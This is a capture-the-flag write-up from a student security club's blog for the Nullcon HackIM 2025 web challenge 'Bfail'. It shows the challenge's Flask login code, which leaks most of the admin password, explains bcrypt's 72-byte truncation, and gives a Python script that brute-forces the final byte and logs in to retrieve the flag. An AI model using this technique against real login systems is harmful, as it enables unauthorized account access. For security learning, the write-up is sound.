<!DOCTYPE html><html lang="en" data-astro-cid-sckkx6r4> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><meta name="generator" content="Astro v5.0.3"><title>GopherHack</title><style>@font-face{font-family:Monaspace Neon;font-style:normal;font-display:swap;font-weight:400;src:url(/_astro/monaspace-neon-latin-400-normal.BZtV1wRa.woff2) format("woff2"),url(/_astro/monaspace-neon-latin-400-normal.DVFelWsN.woff) format("woff")}
@font-face{font-family:Public Sans Variable;font-style:normal;font-display:swap;font-weight:100 900;src:url(/_astro/public-sans-vietnamese-wght-normal.CtlIRbEm.woff2) format("woff2-variations");unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:Public Sans Variable;font-style:normal;font-display:swap;font-weight:100 900;src:url(/_astro/public-sans-latin-ext-wght-normal.DMdr36yP.woff2) format("woff2-variations");unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:Public Sans Variable;font-style:normal;font-display:swap;font-weight:100 900;src:url(/_astro/public-sans-latin-wght-normal.DdeTHZLK.woff2) format("woff2-variations");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}html,body{margin:0;width:100%;height:100%;box-sizing:border-box;color:#beb7a2;background-color:#000;font-size:1.05rem;font-family:Public Sans Variable,sans-serif;line-height:1.5;h1,h2,h3,h4,h5,h6{font-family:Monaspace Neon,monospace;color:#ffde7a}a{color:#d63d61}@media (max-width: 640px){padding-left:1rem;padding-right:1rem}}.mainSection[data-astro-cid-sckkx6r4]{max-width:48rem;margin-left:auto;margin-right:auto}footer[data-astro-cid-sckkx6r4]{margin-top:8rem;text-align:center;margin-bottom:4rem}.content[data-astro-cid-sckkx6r4]{display:flex;height:100%;flex-direction:column;header{display:flex;align-items:center;justify-content:space-between;padding-bottom:2.5rem;padding-top:2.5rem;#logo{font-size:2rem;color:#ffde7a;text-decoration:none;font-family:Monaspace Neon,monospace}@media (max-width: 640px){flex-direction:column}}.links{display:flex;gap:1rem}}
.draft[data-astro-cid-quoef3qp]{color:#ff0}.metadata[data-astro-cid-quoef3qp]{font-size:90%;color:#ffffff80}.postContent[data-astro-cid-quoef3qp]{pre{padding:1rem}}
[data-astro-image]{width:100%;height:auto;object-fit:var(--fit);object-position:var(--pos);aspect-ratio:var(--w) / var(--h)}[data-astro-image=responsive]{max-width:calc(var(--w) * 1px);max-height:calc(var(--h) * 1px)}[data-astro-image=fixed]{width:calc(var(--w) * 1px);height:calc(var(--h) * 1px)}
</style></head> <body data-astro-cid-sckkx6r4> <section class="mainSection" data-astro-cid-sckkx6r4> <div class="content" data-astro-cid-sckkx6r4> <header data-astro-cid-sckkx6r4> <div data-astro-cid-sckkx6r4> <!-- left --> <a href="/" id="logo" data-astro-cid-sckkx6r4>
&#x1F6A9; GopherHack</a> </div> <div data-astro-cid-sckkx6r4> <!-- right --> <div class="links" data-astro-cid-sckkx6r4> <a href="/pages/contests" data-astro-cid-sckkx6r4>Contests</a> <a href="/pages/blog" data-astro-cid-sckkx6r4>Blog</a> <a href="/pages/resources" data-astro-cid-sckkx6r4>Resources</a> <a href="/pages/officers" data-astro-cid-sckkx6r4>Officers</a> </div> <div class="buttons" data-astro-cid-sckkx6r4></div> </div> </header> <main data-astro-cid-sckkx6r4>  <h1 data-astro-cid-quoef3qp>  Nullcon Goa HackIM 2025 CTF: Bfail </h1> <div class="metadata" data-astro-cid-quoef3qp> <div title="2025-02-02T11:56:00.487Z" data-astro-cid-quoef3qp> Sunday, February 2, 2025 </div> <div data-astro-cid-quoef3qp>
Authored by <a href="/authors/dajeff">dajeff</a> </div>  <div data-astro-cid-quoef3qp>Tags: web</div> </div> <div class="postContent" data-astro-cid-quoef3qp> <link rel="stylesheet" href="/_astro/styles.DHdN6dA9.css"/>
<blockquote>
<p>To ‘B’ secure or to ‘b’ fail? Strong passwords for admins are always great, right?</p>
<p>Author: @gehaxelt</p>
<p><a href="http://52.59.124.14:5013">http://52.59.124.14:5013</a></p>
</blockquote>
<p>The page source hints that we can view the server source code at <a href="http://52.59.124.14:5013/source">http://52.59.124.14:5013/source</a>.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">from</span><span style="color:#E1E4E8"> flask </span><span style="color:#F97583">import</span><span style="color:#E1E4E8"> Flask, request, redirect, render_template_string</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> sys</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> os</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> bcrypt</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> urllib.parse</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E1E4E8">app </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> Flask(</span><span style="color:#79B8FF">__name__</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#E1E4E8">app.secret_key </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> os.urandom(</span><span style="color:#79B8FF">16</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#6A737D"># This is super strong! The password was generated quite securely. Here are the first 70 bytes, since you won&#39;t be able to brute-force the rest anyway...</span></span>
<span class="line"><span style="color:#6A737D"># &gt;&gt;&gt; strongpw = bcrypt.hashpw(os.urandom(128),bcrypt.gensalt())</span></span>
<span class="line"><span style="color:#6A737D"># &gt;&gt;&gt; strongpw[:71]</span></span>
<span class="line"><span style="color:#6A737D"># b&#39;\xec\x9f\xe0a\x978\xfc\xb6:T\xe2\xa0\xc9&lt;\x9e\x1a\xa5\xfao\xb2\x15\x86\xe5$\x86Z\x1a\xd4\xca#\x15\xd2x\xa0\x0e0\xca\xbc\x89T\xc5V6\xf1\xa4\xa8S\x8a%I\xd8gI\x15\xe9\xe7$M\x15\xdc@\xa9\xa1@\x9c\xeee\xe0\xe0\xf76&#39;</span></span>
<span class="line"><span style="color:#E1E4E8">app.</span><span style="color:#79B8FF">ADMIN_PW_HASH</span><span style="color:#F97583"> =</span><span style="color:#F97583"> b</span><span style="color:#9ECBFF">&#39;$2b$12$8bMrI6D9TMYXeMv8pq8RjemsZg.HekhkQUqLymBic/cRhiKRa3YPK&#39;</span></span>
<span class="line"><span style="color:#79B8FF">FLAG</span><span style="color:#F97583"> =</span><span style="color:#79B8FF"> open</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">&quot;flag.txt&quot;</span><span style="color:#E1E4E8">).read()</span><span style="color:#FDAEB7;font-style:italic">;</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#B392F0">@app.route</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">&#39;/source&#39;</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> source</span><span style="color:#E1E4E8">():</span></span>
<span class="line"><span style="color:#F97583">    return</span><span style="color:#79B8FF"> open</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">__file__</span><span style="color:#E1E4E8">).read()</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#B392F0">@app.route</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">&#39;/&#39;</span><span style="color:#E1E4E8">, </span><span style="color:#FFAB70">methods</span><span style="color:#F97583">=</span><span style="color:#E1E4E8">[</span><span style="color:#9ECBFF">&quot;GET&quot;</span><span style="color:#E1E4E8">])</span></span>
<span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> index</span><span style="color:#E1E4E8">():</span></span>
<span class="line"><span style="color:#E1E4E8">    username </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> request.form.get(</span><span style="color:#9ECBFF">&quot;username&quot;</span><span style="color:#E1E4E8">, </span><span style="color:#79B8FF">None</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#E1E4E8">    password </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> request.form.get(</span><span style="color:#9ECBFF">&quot;password&quot;</span><span style="color:#E1E4E8">, </span><span style="color:#79B8FF">None</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#E1E4E8"> username </span><span style="color:#F97583">and</span><span style="color:#E1E4E8"> password:</span></span>
<span class="line"><span style="color:#E1E4E8">        username </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> urllib.parse.unquote_to_bytes(username)</span></span>
<span class="line"><span style="color:#E1E4E8">        password </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> urllib.parse.unquote_to_bytes(password)</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#E1E4E8"> username </span><span style="color:#F97583">!=</span><span style="color:#F97583"> b</span><span style="color:#9ECBFF">&quot;admin&quot;</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#9ECBFF"> &quot;Wrong user!&quot;</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#79B8FF"> len</span><span style="color:#E1E4E8">(password) </span><span style="color:#F97583">&gt;</span><span style="color:#79B8FF"> 128</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#9ECBFF"> &quot;Password too long!&quot;</span></span>
<span class="line"><span style="color:#F97583">        if</span><span style="color:#F97583"> not</span><span style="color:#E1E4E8"> bcrypt.checkpw(password, app.</span><span style="color:#79B8FF">ADMIN_PW_HASH</span><span style="color:#E1E4E8">):</span></span>
<span class="line"><span style="color:#F97583">            return</span><span style="color:#9ECBFF"> &quot;Wrong password!&quot;</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#F97583"> f</span><span style="color:#9ECBFF">&quot;&quot;&quot;Congrats! It appears you have successfully bf&#39;ed the password. Here is your </span><span style="color:#79B8FF">{FLAG}</span><span style="color:#9ECBFF">&quot;&quot;&quot;</span><span style="color:#6A737D">  # Use f-string formatting within the template string</span></span>
<span class="line"><span style="color:#6A737D">    # ...</span></span>
<span class="line"></span></code></pre>
<p>Our goal is to find a string that hashes to <code>app.ADMIN_PW_HASH</code>.</p>
<p>The comment gives 71 bytes of the password, despite saying it gives 70. Giving 71 bytes of the password seems strange, so we’ll do some research on the <code>bcrypt.hashpw</code> format (e.g. how many bytes the salt takes up, etc) to see how much information 71 bytes really gives us.</p>
<p>After finding the <a href="https://passlib.readthedocs.io/en/stable/lib/passlib.hash.bcrypt.html#security-issues">documentation</a>, it turns out that “only the first 72 bytes of a password are hashed,” so we only need to brute force the last (72nd) byte of the effective password to find a string that matches the admin password hash.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> bcrypt</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> requests</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E1E4E8">admin </span><span style="color:#F97583">=</span><span style="color:#F97583"> b</span><span style="color:#9ECBFF">&#39;$2b$12$8bMrI6D9TMYXeMv8pq8RjemsZg.HekhkQUqLymBic/cRhiKRa3YPK&#39;</span></span>
<span class="line"><span style="color:#E1E4E8">salt </span><span style="color:#F97583">=</span><span style="color:#F97583"> b</span><span style="color:#9ECBFF">&#39;$2b$12$8bMrI6D9TMYXeMv8pq8Rje&#39;</span></span>
<span class="line"><span style="color:#F97583">for</span><span style="color:#E1E4E8"> b </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> range</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">256</span><span style="color:#E1E4E8">):</span></span>
<span class="line"><span style="color:#E1E4E8">    password </span><span style="color:#F97583">=</span><span style="color:#F97583"> b</span><span style="color:#9ECBFF">&#39;</span><span style="color:#79B8FF">\xec\x9f\xe0</span><span style="color:#9ECBFF">a</span><span style="color:#79B8FF">\x97</span><span style="color:#9ECBFF">8</span><span style="color:#79B8FF">\xfc\xb6</span><span style="color:#9ECBFF">:T</span><span style="color:#79B8FF">\xe2\xa0\xc9</span><span style="color:#9ECBFF">&lt;</span><span style="color:#79B8FF">\x9e\x1a\xa5\xfa</span><span style="color:#9ECBFF">o</span><span style="color:#79B8FF">\xb2\x15\x86\xe5</span><span style="color:#9ECBFF">$</span><span style="color:#79B8FF">\x86</span><span style="color:#9ECBFF">Z</span><span style="color:#79B8FF">\x1a\xd4\xca</span><span style="color:#9ECBFF">#</span><span style="color:#79B8FF">\x15\xd2</span><span style="color:#9ECBFF">x</span><span style="color:#79B8FF">\xa0\x0e</span><span style="color:#9ECBFF">0</span><span style="color:#79B8FF">\xca\xbc\x89</span><span style="color:#9ECBFF">T</span><span style="color:#79B8FF">\xc5</span><span style="color:#9ECBFF">V6</span><span style="color:#79B8FF">\xf1\xa4\xa8</span><span style="color:#9ECBFF">S</span><span style="color:#79B8FF">\x8a</span><span style="color:#9ECBFF">%I</span><span style="color:#79B8FF">\xd8</span><span style="color:#9ECBFF">gI</span><span style="color:#79B8FF">\x15\xe9\xe7</span><span style="color:#9ECBFF">$M</span><span style="color:#79B8FF">\x15\xdc</span><span style="color:#9ECBFF">@</span><span style="color:#79B8FF">\xa9\xa1</span><span style="color:#9ECBFF">@</span><span style="color:#79B8FF">\x9c\xee</span><span style="color:#9ECBFF">e</span><span style="color:#79B8FF">\xe0\xe0\xf7</span><span style="color:#9ECBFF">6&#39;</span><span style="color:#F97583"> +</span><span style="color:#E1E4E8"> b.to_bytes()</span></span>
<span class="line"><span style="color:#E1E4E8">    h </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> bcrypt.hashpw(password, salt)</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#E1E4E8"> h </span><span style="color:#F97583">==</span><span style="color:#E1E4E8"> admin:</span></span>
<span class="line"><span style="color:#F97583">        break</span></span>
<span class="line"></span>
<span class="line"><span style="color:#6A737D"># password = b&quot;\xec\x9f\xe0a\x978\xfc\xb6:T\xe2\xa0\xc9&lt;\x9e\x1a\xa5\xfao\xb2\x15\x86\xe5$\x86Z\x1a\xd4\xca#\x15\xd2x\xa0\x0e0\xca\xbc\x89T\xc5V6\xf1\xa4\xa8S\x8a%I\xd8gI\x15\xe9\xe7$M\x15\xdc@\xa9\xa1@\x9c\xeee\xe0\xe0\xf76\xaa&quot;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#E1E4E8">session </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> requests.Session()</span></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(session.get(</span><span style="color:#9ECBFF">&quot;http://52.59.124.14:5013&quot;</span><span style="color:#E1E4E8">, </span><span style="color:#FFAB70">data</span><span style="color:#F97583">=</span><span style="color:#E1E4E8">{</span><span style="color:#9ECBFF">&quot;username&quot;</span><span style="color:#E1E4E8">: </span><span style="color:#9ECBFF">&quot;admin&quot;</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">&quot;password&quot;</span><span style="color:#E1E4E8">: password}).text)</span></span>
<span class="line"></span></code></pre>
<p>Flag: <code>ENO{BCRYPT_FAILS_TO_B_COOL_IF_THE_PW_IS_TOO_LONG}</code></p> </div>  </main> <footer data-astro-cid-sckkx6r4>
&mdash;
<a href="https://github.com/gopherhackumn/website" target="_blank" rel="noopener" data-astro-cid-sckkx6r4>Website source</a>
&mdash;
</footer> </div> </section> </body></html> 